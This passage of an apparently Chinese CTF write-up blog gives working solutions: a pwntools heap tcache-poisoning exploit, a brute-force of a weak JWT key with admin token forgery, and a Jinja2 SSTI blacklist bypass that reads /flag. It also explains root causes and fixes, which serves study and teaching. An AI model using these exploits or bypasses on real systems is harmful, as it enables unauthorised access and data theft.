import re\n\n    context.arch = 'amd64'\n    elf = ELF('harbor_packer')\n    win_addr = elf.symbols&#91;'win']       # 0x401c35\n    target_ptr = 0x404020               # 16-byte aligned, func ptr at +8\n\n    r = remote('nc1.ctfplus.cn', 35551)\n    r.recvuntil(b'&gt;')\n\n    def create(slot, size, tag, data):\n        r.sendline(b'1'); r.recvuntil(b'slot:'); r.sendline(str(slot).encode())\n        r.recvuntil(b'manifest size:'); r.sendline(str(size).encode())\n        r.recvuntil(b'tag:'); r.sendline(tag)\n        r.recvuntil(b'manifest bytes:'); r.send(data); r.recvuntil(b'&gt;')\n\n    def scrap_slot(slot):\n        r.sendline(b'4'); r.recvuntil(b'slot:')\n        r.sendline(str(slot).encode()); r.recvuntil(b'&gt;')\n\n    # Heap leak\n    create(0, 128, b'AAAA', b'B'*128)\n    resp = b''; 
r.sendline(b'3'); r.recvuntil(b'slot:'); r.sendline(b'0')\n    resp = r.recvuntil(b'&gt;')\n    manifest0 = int(re.search(rb'manifest ptr: (0x&#91;0-9a-f]+)', resp).group(1), 16)\n\n    # Setup tcache (4 entries in 0x30 bin)\n    create(1, 32, b'VICT', b'V'*32)\n    create(3, 32, b'VIC2', b'W'*32)\n    create(2, 256, b'PADD', b'P'*256)  # protect top chunk\n    scrap_slot(3); scrap_slot(1)\n\n    # Safe-linking calc\n    manifest1_user = manifest0 + 0xC0\n    xor_key = manifest1_user &gt;&gt; 12\n    mangled_fd = target_ptr ^ xor_key\n\n    # Overflow: repack slot 0, segments=9\n    payload  = b'\\x00'*0x20 + p64(0) + p64(0x31) + p64(mangled_fd) + p64(0)\n    payload += b'\\x00'*(288 - len(payload))\n    r.sendline(b'2'); r.recvuntil(b'slot:'); r.sendline(b'0')\n    r.recvuntil(b'segment count:'); r.sendline(b'9')\n    r.recvuntil(b'manifest bytes:'); r.send(payload); r.recvuntil(b'&gt;')\n\n    # Poisoned alloc \u2192 overwrite function ptr\n    r.sendline(b'1'); r.recvuntil(b'slot:'); r.sendline(b'1')\n    r.recvuntil(b'manifest size:'); r.sendline(b'32')\n    r.recvuntil(b'tag:'); r.sendline(b'X')\n    r.recvuntil(b'manifest bytes:')\n    r.send(b'\\x00'*8 + p64(win_addr) + b'\\x00'*16)\n    r.recvuntil(b'&gt;')\n\n    # Trigger: Exit \u2192 call func ptr \u2192 win\n    r.sendline(b'5')\n    data = r.recvall(timeout=8)\n    print(data.decode())<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5f97\u5230flag\">\u5f97\u5230Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG{4090ecf1-31b2-4108-905f-ff06418236d2}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"web\">Web<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u8d22\u52a1\u5df2\u9605\">\u8d22\u52a1\u5df2\u9605<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u5ba1\u6279\u6d41\u5076\u5c14\u4e5f\u4f1a\u8ba4\u9519\u8def\uff0c\u5c24\u5176\u662f\u770b\u5230 finance. 
\u5f00\u5934\u7684\u65f6\u5019<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u58a8\u4ed3\u4e91\u91c7\u4f9b\u5e94\u5546\u5bf9\u8d26\u4e2d\u5fc3\u662f\u4e00\u4e2a\u4e09\u89d2\u8272\uff08\u4f9b\u5e94\u5546\/\u8d22\u52a1\/\u8fd0\u8425\uff09\u5de5\u4f5c\u6d41\u7cfb\u7edf\u3002\u8d22\u52a1 <code>finance_pass<\/code> \u4f1a\u5c06\u5355\u636e\u8def\u7531\u5230\u98ce\u63a7\u6302\u8d77\uff08RISK_HOLD\uff09\uff0c\u9700\u8fd0\u8425 <code>risk_release<\/code> \u624d\u80fd\u5f52\u6863\u3002Flag \u85cf\u5728\u5f52\u6863\u540e\u7684\u4ed8\u6b3e\u56de\u5355\u63a5\u53e3 <code>\/api\/settlements\/{id}\/receipt<\/code> \u4e2d\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u83b7\u53d6\u6d4b\u8bd5\u8d26\u53f7\u5e76\u7406\u89e3\u5de5\u4f5c\u6d41\">1: \u83b7\u53d6\u6d4b\u8bd5\u8d26\u53f7\u5e76\u7406\u89e3\u5de5\u4f5c\u6d41<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u767b\u5f55\u9875\u76f4\u63a5\u63d0\u4f9b\u4e86\u4e09\u4e2a\u6d4b\u8bd5\u8d26\u53f7\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u8d26\u53f7<\/th><th>\u5bc6\u7801<\/th><th>\u89d2\u8272<\/th><th>\u53ef\u7528\u64cd\u4f5c<\/th><\/tr><\/thead><tbody><tr><td><code>supplier_chen<\/code><\/td><td><code>MingCang@101<\/code><\/td><td>\u4f9b\u5e94\u5546<\/td><td><code>supplier_submit<\/code> \u2192 \u8d22\u52a1\u590d\u6838\u4e2d<\/td><\/tr><tr><td><code>finance_lin<\/code><\/td><td><code>Finance#2026<\/code><\/td><td>\u8d22\u52a1<\/td><td><code>finance_pass<\/code> \u2192 \u98ce\u63a7\u6302\u8d77<\/td><\/tr><tr><td><code>ops_wu<\/code><\/td><td><code>Ops#2026<\/code><\/td><td>\u91c7\u8d2d\u8fd0\u8425<\/td><td><code>risk_release<\/code> \u2192 \u5df2\u4ed8\u6b3e\u5f52\u6863<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u63d0\u793a&#8221;\u5ba1\u6279\u6d41\u5076\u5c14\u4e5f\u4f1a\u8ba4\u9519\u8def\uff0c\u5c24\u5176\u662f\u770b\u5230 finance. 
\u5f00\u5934\u7684\u65f6\u5019&#8221;\u2014\u2014<code>finance_pass<\/code> \u672c\u5e94\u76f4\u63a5\u5f52\u6863\uff0c\u5374\u88ab\u9519\u8bef\u8def\u7531\u5230\u98ce\u63a7\u6302\u8d77\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u8d70\u5b8c\u4e09\u8282\u70b9\u5b8c\u6574\u6d41\u7a0b\">2: \u8d70\u5b8c\u4e09\u8282\u70b9\u5b8c\u6574\u6d41\u7a0b<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4efb\u4e00\u5f85\u5904\u7406\u5355\u636e\u4f9d\u6b21\u63d0\u4ea4\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    import requests\n\n    BASE = \"http:\/\/8080-f8e0ec92-2443-4c32-afbb-70e089298c60.challenge.ctfplus.cn\"\n\n    def login(username, password):\n        s = requests.Session()\n        s.post(f\"{BASE}\/login\", data={\"username\": username, \"password\": password})\n        return s\n\n    def action(session, business_no, action_name):\n        return session.post(f\"{BASE}\/api\/settlements\/{business_no}\/actions\",\n            json={\"action\": action_name, \"memo\": \"\", \"proofCode\": \"\"}).json()\n\n    # \u4f9b\u5e94\u5546\u63d0\u4ea4\n    s1 = login(\"supplier_chen\", \"MingCang@101\")\n    action(s1, \"MC-202604-0091\", \"supplier_submit\")  # \u2192 FINANCE_REVIEW\n\n    # \u8d22\u52a1\u590d\u6838\uff08\u8d70\u5230\u98ce\u63a7\u6302\u8d77\u2014\u2014\u5ba1\u6279\u6d41 bug\uff09\n    s2 = login(\"finance_lin\", \"Finance#2026\")\n    action(s2, \"MC-202604-0091\", \"finance_pass\")    # \u2192 RISK_HOLD\n\n    # \u8fd0\u8425\u91ca\u653e\n    s3 = login(\"ops_wu\", \"Ops#2026\")\n    action(s3, \"MC-202604-0091\", \"risk_release\")    # \u2192 ARCHIVED_PAID<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"3-\u8bfb\u53d6\u5f52\u6863\u56de\u5355\">3: \u8bfb\u53d6\u5f52\u6863\u56de\u5355<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>resp = s3.get(f\"{BASE}\/api\/settlements\/MC-202604-0091\/receipt\").json()\nprint(resp&#91;\"receipt\"])\n# \u4ed8\u6b3e\u6d41\u6c34 MC-PAY-202604-0091 \/ 
\u5f52\u6863\u6821\u9a8c\u7801\uff1aFLAG{...}<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5f97\u5230flag\">\u5f97\u5230Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG{9f7e15fa-005b-4431-a85e-2a3a4a1bf085}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u4e00\u679a\u997c\u5e72\u7684\u8d8a\u6743\u822a\u7ebf\">\u4e00\u679a\u997c\u5e72\u7684\u8d8a\u6743\u822a\u7ebf<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u6709\u4e9b\u6865\u53eb legacy\uff0c\u6709\u4e9b\u94a5\u5319\u4e5f\u5f88 legacy\u3002\u8001\u7cfb\u7edf\u7684\u5473\u9053\uff0c\u5f80\u5f80\u85cf\u5728\u65e5\u671f\u548c\u73af\u5883\u540d\u91cc\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u63d0\u793a\u5185\u5bb9<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 1: \u767b\u5f55\u540e\u4e0d\u8981\u53ea\u770b\u9875\u9762\u5185\u5bb9\uff0c\u91cd\u70b9\u89c2\u5bdf\u670d\u52a1\u7aef\u4e0b\u53d1\u7684 session Cookie\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 2: session \u7684\u7ed3\u6784\u53ef\u80fd\u80fd\u88ab\u89e3\u6790\uff0c\u770b\u770b\u5b83\u662f\u4e0d\u662f JWT\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 3: \u6ce8\u610f JWT \u7684 alg\u3001kid\u3001iss\uff0c\u4ee5\u53ca payload \u4e2d\u7684 role\u3001tenant\u3001scopes\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 4: \/api\/audit\/identity-bridge \u91cc\u7684 legacy SSO \u4fe1\u606f\u4e0d\u662f\u6446\u8bbe\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 5: HS256 \u4f7f\u7528\u5bf9\u79f0\u5bc6\u94a5\uff0c\u62ff\u5230\u5408\u6cd5 token \u540e\u53ef\u4ee5\u5c1d\u8bd5\u79bb\u7ebf\u9a8c\u8bc1\u5f31\u5bc6\u94a5\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 6: \u5bc6\u94a5\u66f4\u50cf\u4e1a\u52a1\u7ebf\u7d22\u62fc\u51fa\u6765\u7684\u5b57\u7b26\u4e32\uff0c\u800c\u4e0d\u662f\u7eaf\u968f\u673a\u53e3\u4ee4\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 7: 
\u7ba1\u7406\u5458\u63a5\u53e3\u4e0d\u4ec5\u68c0\u67e5 role\uff0c\u8fd8\u53ef\u80fd\u68c0\u67e5 tenant \u548c scopes\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Hint 8: \u76ee\u6807\u63a5\u53e3\u662f \/admin\/settlements\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">DockLine Partner Portal \u4f7f\u7528 HS256 \u7b7e\u540d JWT \u4f5c\u4e3a session Cookie\u3002kid \u4e3a <code>legacy-prod-202402<\/code>\uff0ciss \u4e3a <code>dockline-sso<\/code>\u3002\u8eab\u4efd\u6865\u63a5\u63a5\u53e3 <code>\/api\/audit\/identity-bridge<\/code> \u6cc4\u9732\u4e86\u5b8c\u6574\u7684 JWT \u914d\u7f6e\u6307\u7eb9\u3002\u901a\u8fc7\u4e1a\u52a1\u5173\u952e\u8bcd\u6392\u5217\u7ec4\u5408\u7206\u7834\u51fa\u5f31\u5bf9\u79f0\u5bc6\u94a5 <code>dockline-prod-202402<\/code>\uff0c\u4f2a\u9020 admin \u89d2\u8272 JWT \u8bbf\u95ee <code>\/admin\/settlements<\/code> \u83b7\u53d6 flag\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u767b\u5f55\u83b7\u53d6-jwt\">1: \u767b\u5f55\u83b7\u53d6 JWT<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u767b\u5f55\u9875\u9884\u586b\u4e86\u6d4b\u8bd5\u51ed\u8bc1 <code>carrier.ops@harbor.test<\/code> \/ <code>Harbor@2026<\/code>\uff0cPOST <code>\/api\/login<\/code> \u540e\u5728 <code>Set-Cookie: session=<\/code> \u62ff\u5230 JWT\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    Header:  {\"alg\":\"HS256\",\"typ\":\"JWT\",\"kid\":\"legacy-prod-202402\"}\n    Payload: {\"role\":\"carrier\",\"tenant\":\"harbor\",\"scopes\":&#91;\"shipment:read\",\"invoice:read\"],\"iss\":\"dockline-sso\"}<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u679a\u4e3e\u5f31\u5bc6\u94a5\">2: \u679a\u4e3e\u5f31\u5bc6\u94a5<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee <code>\/api\/audit\/identity-bridge<\/code> \u83b7\u53d6 SSO \u8bca\u65ad\u4fe1\u606f\u2014\u2014\u670d\u52a1\u540d <code>legacy-sso-bridge<\/code>\u3001owner <code>finance-platform<\/code>\u3001issuer 
<code>dockline-sso<\/code>\u3002\u63d0\u793a\u660e\u786e\u8bf4\u660e HS256 \u4f7f\u7528\u5bf9\u79f0\u5bc6\u94a5\u4e14&#8221;\u5bc6\u94a5\u66f4\u50cf\u4e1a\u52a1\u7ebf\u7d22\u62fc\u51fa\u6765\u7684\u5b57\u7b26\u4e32&#8221;\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c06 <code>kid<\/code>\u3001<code>iss<\/code>\u3001\u670d\u52a1\u540d\u7b49\u5173\u952e\u8bcd\u505a\u6392\u5217\u7ec4\u5408\uff0cHMAC-SHA256 \u7b7e\u540d\u6bd4\u5bf9\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    import hmac, hashlib, base64, json, time, itertools\n\n    token = \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImxlZ2FjeS1wcm9kLTIwMjQwMiJ9.eyJzdWIiOiJ1c3JfNDgyOSIsImVtYWlsIjoiY2Fycmllci5vcHNAaGFyYm9yLnRlc3QiLCJuYW1lIjoiSGFyYm9yIEZyZWlnaHQgT3BzIiwiY29tcGFueSI6IkhhcmJvciBGcmVpZ2h0IENvLiIsInJvbGUiOiJjYXJyaWVyIiwidGVuYW50IjoiaGFyYm9yIiwic2NvcGVzIjpbInNoaXBtZW50OnJlYWQiLCJpbnZvaWNlOnJlYWQiXSwiaWF0IjoxNzc4OTE0MDExLCJleHAiOjE3Nzg5MjEyMTEsImlzcyI6ImRvY2tsaW5lLXNzbyJ9.FdYEmqnSMMYXdOKKr7mp7pdMaeV-BeLU6sXYzRnTpFM\"\n    sig = token.split('.')&#91;2]\n    data = '.'.join(token.split('.')&#91;:2])\n\n    terms = &#91;\"dockline\", \"legacy\", \"prod\", \"202402\", \"finance\", \"platform\", \"sso\", \"bridge\", \"harbor\"]\n    for r in range(2, 6):\n        for combo in itertools.permutations(terms&#91;:6], r):\n            for sep in &#91;'-', '_', ':']:\n                key = sep.join(combo)\n                check = base64.urlsafe_b64encode(hmac.new(key.encode(), data.encode(), hashlib.sha256).digest()).rstrip(b'=').decode()\n                if check == sig:\n                    print(f\"FOUND: {key}\")  # dockline-prod-202402\n                    break<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"3-\u4f2a\u9020-admin-jwt\">3: \u4f2a\u9020 Admin JWT<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7528\u6062\u590d\u7684\u5bc6\u94a5\u7b7e\u540d\u65b0\u7684 JWT\uff0c\u5c06 <code>role<\/code> \u6539\u4e3a <code>admin<\/code>\u3001<code>tenant<\/code> 
\u6539\u4e3a <code>dockline<\/code>\uff0c\u589e\u52a0 <code>admin:read<\/code> \u7b49 scope\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    KEY = \"dockline-prod-202402\"\n    header = {\"alg\":\"HS256\",\"typ\":\"JWT\",\"kid\":\"legacy-prod-202402\"}\n    payload = {\"sub\":\"usr_1001\",\"email\":\"mara.wei@dockline.internal\",\"name\":\"Mara Wei\",\"company\":\"DockLine\",\n               \"role\":\"admin\",\"tenant\":\"dockline\",\n               \"scopes\":&#91;\"settlement:read\",\"admin:read\",\"finance:read\",\"settlement:write\"],\n               \"iat\":int(time.time()),\"exp\":int(time.time())+7200,\"iss\":\"dockline-sso\"}\n\n    h = base64.urlsafe_b64encode(json.dumps(header,separators=(',',':')).encode()).rstrip(b'=').decode()\n    p = base64.urlsafe_b64encode(json.dumps(payload,separators=(',',':')).encode()).rstrip(b'=').decode()\n    s = base64.urlsafe_b64encode(hmac.new(KEY.encode(),f\"{h}.{p}\".encode(),hashlib.sha256).digest()).rstrip(b'=').decode()\n    admin_jwt = f\"{h}.{p}.{s}\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee <code>\/admin\/settlements<\/code> \u5e26 <code>Cookie: session={admin_jwt}<\/code> \u5373\u8fd4\u56de flag\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">安全点评：根因有两层。一是 HS256 密钥由业务关键词拼接而成，熵极低，拿到任意一枚合法令牌就能离线穷举；二是 <code>\/admin\/settlements<\/code> 的授权判断完全建立在令牌自带的 <code>role<\/code>、<code>tenant<\/code>、<code>scopes<\/code> 上，签名一旦可伪造，所有权限边界随之失效。修复应使用至少 256 bit 的随机密钥（或改用 RS256\/ES256 等非对称算法，并在验签时固定允许的 <code>alg<\/code>），同时把管理员接口的授权改为以服务端用户记录为准，而不是信任令牌中的声明。<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5f97\u5230flag\">\u5f97\u5230Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>FLAG{554ef4ab-2e32-4b69-945c-47a70341e41b}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"\u5de5\u5355\u522b\u4e71\u586b\">\u5de5\u5355\u522b\u4e71\u586b<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u552e\u540e\u540c\u5b66\u8bf4\u8fd9\u4e2a\u6a21\u677f\u53ea\u80fd\u586b\u4e1a\u52a1\u53d8\u91cf\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u6a21\u677f\u5f15\u64ce\u597d\u50cf\u6709\u70b9\u592a\u70ed\u5fc3\u4e86\uff1a\u4f60\u5199\u4ec0\u4e48\uff0c\u5b83\u90fd\u60f3\u5e2e\u4f60\u7b97\u4e00\u7b97\u3002<\/p>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u5ba1\u8ba1\u7cfb\u7edf\u4e5f\u5728\u52aa\u529b\u4e0a\u73ed\uff0c\u53ea\u662f\u5b83\u53ef\u80fd\u4e0d\u592a\u8ba4\u8bc6\u201c\u6362\u4e86\u9a6c\u7532\u201d\u7684\u5b57\u7b26\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u9996\u9875\u770b\u8d77\u6765\u662f\u4e00\u4e2a\u5f88\u6b63\u5e38\u7684\u6a21\u677f\u9884\u89c8\u7cfb\u7edf\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7528\u6237\u53ef\u4ee5\u7f16\u8f91 <code>title<\/code>\u3001<code>body<\/code>\u3001<code>footer<\/code><\/li>\n\n\n\n<li>\u9875\u9762\u63d0\u793a\u652f\u6301 <code>[[ ticket.id ]]<\/code>\u3001<code>[[ team.name ]]<\/code> \u8fd9\u4e00\u7c7b\u5360\u4f4d\u7b26<\/li>\n\n\n\n<li>\u70b9\u51fb\u201c\u9884\u89c8\u201d\u540e\uff0c\u524d\u7aef\u4f1a\u5411 <code>\/api\/preview<\/code> \u53d1\u9001 JSON \u8bf7\u6c42<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u524d\u7aef\u6838\u5fc3\u903b\u8f91\u975e\u5e38\u76f4\u63a5\uff1a const response = await fetch(&#8220;\/api\/preview&#8221;, { method: &#8220;POST&#8221;, headers: { &#8220;Content-Type&#8221;: &#8220;application\/json&#8221; }, body: JSON.stringify(payload), });<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5230\u8fd9\u91cc\u57fa\u672c\u53ef\u4ee5\u786e\u5b9a\uff0c\u771f\u6b63\u7684\u653b\u51fb\u9762\u5728\u670d\u52a1\u7aef\u6a21\u677f\u6e32\u67d3\u6d41\u7a0b\uff0c\u800c\u4e0d\u662f\u524d\u7aef\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u6f0f\u6d1e\u786e\u8ba4\">\u6f0f\u6d1e\u786e\u8ba4<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7b2c\u4e00\u6b65\u5148\u9a8c\u8bc1\u6a21\u677f\u8868\u8fbe\u5f0f\u662f\u5426\u4f1a\u88ab\u6267\u884c\uff1a [[ 7*7 ]]<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u56de\u663e\u7ed3\u679c\u4e3a\uff1a 49<\/p>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u8fd9\u4e00\u6b65\u5df2\u7ecf\u8db3\u591f\u8bf4\u660e\u95ee\u9898\uff1a\u7528\u6237\u8f93\u5165\u5e76\u4e0d\u662f\u88ab\u5f53\u4f5c\u666e\u901a\u5b57\u7b26\u4e32\u5904\u7406\uff0c\u800c\u662f\u88ab\u9001\u8fdb\u4e86 Jinja2 \u6a21\u677f\u5f15\u64ce\u6267\u884c\u3002\u8fd9\u5c31\u662f\u6807\u51c6\u7684 <strong>SSTI<\/strong>\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u6e90\u7801\u8fd8\u539f\u4e0e\u95ee\u9898\u672c\u8d28\">\u6e90\u7801\u8fd8\u539f\u4e0e\u95ee\u9898\u672c\u8d28<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7ee7\u7eed\u5229\u7528 SSTI \u8bfb\u53d6\u6e90\u7801\u540e\uff0c\u53ef\u4ee5\u8fd8\u539f\u51fa\u6838\u5fc3\u903b\u8f91\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>    PLACEHOLDER_RE = re.compile(r\"\\&#91;\\&#91;\\s*(.*?)\\s*\\]\\]\", re.DOTALL)\n\n    BLOCKED_TOKENS = (\n        \"{{\", \"}}\", \"{%\", \"%}\",\n        \"__\", \"class\", \"mro\", \"subclasses\",\n        \"globals\", \"builtins\", \"import\",\n        \"eval\", \"exec\", \"popen\", \"system\",\n        \"os\", \"config\", \"request\", \"flag\", \"\/\",\n    )\n\n    def compile_template(source: str) -&gt; str:\n        return PLACEHOLDER_RE.sub(lambda match: \"{{ \" + match.group(1) + \" }}\", source)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u91cc\u7684\u8bbe\u8ba1\u95ee\u9898\u975e\u5e38\u660e\u663e\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u4e1a\u52a1\u5360\u4f4d\u7b26 <code>[[ ... ]]<\/code> \u88ab\u76f4\u63a5\u8f6c\u6362\u6210\u4e86 Jinja2 \u8868\u8fbe\u5f0f <code>{{ ... 
}}<\/code>\u3002<\/li>\n\n\n\n<li>\u7528\u6237\u8f93\u5165\u6ca1\u6709\u8fdb\u5165\u5b89\u5168\u767d\u540d\u5355\u89e3\u6790\uff0c\u800c\u662f\u8fdb\u5165\u4e86\u771f\u5b9e\u6a21\u677f\u6267\u884c\u73af\u5883\u3002<\/li>\n\n\n\n<li>\u6240\u8c13\u201c\u9632\u62a4\u201d\u53ea\u662f\u7b80\u5355\u7684\u9ed1\u540d\u5355\u5b57\u7b26\u4e32\u5339\u914d\u3002<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u7c7b\u9632\u62a4\u7684\u6839\u672c\u7f3a\u9677\u5728\u4e8e\uff1a<strong>\u5b83\u62e6\u7684\u662f\u5b57\u9762\u91cf\uff0c\u4e0d\u662f\u8bed\u4e49\u3002<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6bd4\u5982\u5b83\u7981\u6b62 <code>globals<\/code>\uff0c\u4f46\u5e76\u4e0d\u80fd\u963b\u6b62\u6211\u4eec\u5199\u6210\uff1a<code>'glo' ~ 'bals'<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u540c\u7406\uff0c<code>os<\/code>\u3001<code>builtins<\/code>\u3001<code>flag<\/code>\u3001<code>\/<\/code> \u90fd\u53ef\u4ee5\u88ab\u8fd0\u884c\u65f6\u62fc\u63a5\u51fa\u6765\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">修复思路：问题不在黑名单不够长，而在 <code>compile_template<\/code> 把用户可控文本原样改写成了 Jinja2 表达式交给引擎求值。正确做法是把占位符当数据处理：用 <code>PLACEHOLDER_RE<\/code> 匹配后只接受 <code>ticket.id<\/code>、<code>team.name<\/code> 这类白名单键名并查表替换，其余文本按字面输出；用户内容只能作为变量传入固定的服务端模板，永远不能成为模板源码。即使改用 <code>SandboxedEnvironment<\/code>，也只应视为纵深防御，不能替代这一点。<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5229\u7528\u601d\u8def\">\u5229\u7528\u601d\u8def<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u6700\u7a33\u5b9a\u7684\u5229\u7528\u94fe\u6765\u81ea Jinja2 \u5185\u7f6e\u5bf9\u8c61 <code>lipsum<\/code>\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>lipsum<\/code> \u662f\u4e00\u4e2a\u51fd\u6570\u5bf9\u8c61\uff0c\u800c\u51fd\u6570\u5bf9\u8c61\u5929\u7136\u5e26\u6709 <code>__globals__<\/code>\u3002\u867d\u7136\u9898\u76ee\u62e6\u622a\u4e86 <code>__<\/code> \u548c <code>globals<\/code>\uff0c\u4f46\u7531\u4e8e\u53ea\u662f\u9ed1\u540d\u5355\uff0c\u53ef\u4ee5\u901a\u8fc7\u5b57\u7b26\u4e32\u62fc\u63a5\u7ed5\u8fc7\uff1a<code>lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_')<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u62ff\u5230 <code>__globals__<\/code> 
\u540e\uff0c\u5c31\u53ef\u4ee5\u8fdb\u4e00\u6b65\u8bbf\u95ee\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>os<\/code><\/li>\n\n\n\n<li><code>__builtins__<\/code><\/li>\n\n\n\n<li><code>open<\/code><\/li>\n\n\n\n<li><code>chr<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e8e\u662f\u6574\u6761\u5229\u7528\u94fe\u5c31\u6210\u578b\u4e86\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u901a\u8fc7 <code>lipsum<\/code> \u62ff\u5230 <code>__globals__<\/code><\/li>\n\n\n\n<li>\u4ece\u4e2d\u53d6\u51fa <code>__builtins__<\/code><\/li>\n\n\n\n<li>\u7528 <code>chr(47)<\/code> \u6784\u9020 <code>\/<\/code><\/li>\n\n\n\n<li>\u7528 <code>chr(102) chr(108) chr(97) chr(103)<\/code> \u6784\u9020 <code>flag<\/code><\/li>\n\n\n\n<li>\u8c03\u7528 <code>open('\/flag').read()<\/code> \u8bfb\u53d6\u6587\u4ef6<\/li>\n<\/ol>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5173\u952e\u5229\u7528\u8fc7\u7a0b\">\u5173\u952e\u5229\u7528\u8fc7\u7a0b<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"1-\u9a8c\u8bc1\u8868\u8fbe\u5f0f\u6267\u884c\">1. \u9a8c\u8bc1\u8868\u8fbe\u5f0f\u6267\u884c<\/h5>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;&#91; 7*7 ]]<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd4\u56de\uff1a 49<\/p>\n\n\n\n<h6 class=\"wp-block-heading\" id=\"2-\u786e\u8ba4\u53ef\u4ee5\u6478\u5230-lipsum-globals\">2. \u786e\u8ba4\u53ef\u4ee5\u6478\u5230 <code>lipsum.__globals__<\/code><\/h6>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;&#91; lipsum|attr('_'~'_'~'glo'~'bals'~'_'~'_') 